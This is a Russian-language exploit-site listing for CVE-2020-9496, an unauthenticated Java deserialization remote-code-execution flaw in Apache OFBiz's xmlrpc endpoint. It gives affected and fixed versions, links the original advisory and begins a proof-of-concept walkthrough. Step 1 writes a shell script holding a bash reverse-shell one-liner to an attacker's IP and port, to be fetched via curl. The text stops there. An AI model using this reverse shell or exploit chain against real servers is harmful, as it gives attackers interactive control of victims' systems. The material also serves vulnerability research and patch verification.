## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-G33XTER-CVE-2020-9496
# CVE-2020-9496 - RCE
Поскольку два запроса, связанных с xmlrpc, в webtools (xmlrpc и ping) не используют аутентификацию, они уязвимы для небезопасной десериализации. Эта проблема была сообщена команде безопасности Альваро Муньосом some-email@example.com из команды GitHub Security Lab.
Эта уязвимость существует из-за проблем с сериализацией Java при обработке запросов, отправляемых на /webtools/control/xmlrpc. Удаленный неаутентифицированный злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированный запрос. Успешная эксплуатация приводит к выполнению произвольного кода.
# Затронутая версия 17.12.01
# Исправленные версии 18.12.01, 17.12.04
Оригинальный блог: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Для работы этого POC нам нужно разместить shell-скрипт и выполнить/получить доступ к этому файлу через curl.
### ШАГ 1: Создайте shell-файл с помощью однострочной команды Bash с вашим IP-адресом и портом.
root@kitploit:~
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/8001 0>&1